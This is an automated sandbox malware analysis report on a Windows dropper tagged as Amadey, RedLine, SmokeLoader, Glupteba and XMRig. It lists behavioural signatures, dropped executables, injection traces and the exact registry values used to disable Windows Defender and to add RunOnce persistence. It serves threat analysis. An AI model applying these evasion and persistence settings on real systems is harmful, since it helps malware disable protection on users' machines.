Malware Analysis Report

2024-10-24 19:58

Sample ID 231104-hjl97sch71
Target af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe
SHA256 af9e55e83d026cf03000fa394257145ef2bd4860aa5a7dc9ff95509fb294e246
Tags
amadey glupteba healer redline sectoprat smokeloader xmrig kedru livetraffic pixelnew2.0 plost up3 backdoor paypal discovery dropper evasion infostealer loader miner persistence phishing rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

af9e55e83d026cf03000fa394257145ef2bd4860aa5a7dc9ff95509fb294e246

Threat Level: Known bad

The file af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe was found to be: Known bad.

Malicious Activity Summary

amadey glupteba healer redline sectoprat smokeloader xmrig kedru livetraffic pixelnew2.0 plost up3 backdoor paypal discovery dropper evasion infostealer loader miner persistence phishing rat spyware stealer trojan upx

RedLine

SmokeLoader

Healer

RedLine payload

Detects Healer an antivirus disabler dropper

SectopRAT

Glupteba

Glupteba payload

Modifies Windows Defender Real-time Protection settings

SectopRAT payload

xmrig

Amadey

XMRig Miner payload

Stops running service(s)

Blocklisted process makes network request

Modifies Windows Firewall

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

UPX packed file

Checks computer location settings

Windows security modification

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Detected potential entity reuse from brand paypal.

Suspicious use of SetThreadContext

Launches sc.exe

Enumerates physical storage devices

Program crash

Unsigned PE

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-04 06:46

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-04 06:46

Reported

2023-11-04 06:48

Platform

win10v2004-20231020-en

Max time kernel

77s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe"

Signatures

Amadey

trojan amadey

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3528.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\45C5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\74E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Wu99NZ4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2tQ708mV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3528.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3EDF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45C5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\74E.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Detected potential entity reuse from brand paypal.

phishing paypal

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4492 set thread context of 668 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Wu99NZ4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 6676 set thread context of 6840 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3EDF.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45C5.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4548 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe
PID 4548 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe
PID 4548 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe
PID 2836 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe
PID 2836 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe
PID 2836 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe
PID 2836 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe
PID 2836 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe
PID 964 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe
PID 964 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe
PID 964 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe
PID 4548 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe
PID 4548 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe
PID 4548 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe
PID 4076 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe C:\Windows\SysWOW64\schtasks.exe
PID 4076 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe C:\Windows\SysWOW64\schtasks.exe
PID 4076 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe C:\Windows\SysWOW64\schtasks.exe
PID 4076 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe C:\Windows\SysWOW64\cmd.exe
PID 4076 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe C:\Windows\SysWOW64\cmd.exe
PID 4076 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2172 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2172 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2172 wrote to memory of 4728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2172 wrote to memory of 4728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2172 wrote to memory of 4728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2172 wrote to memory of 2644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 2644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
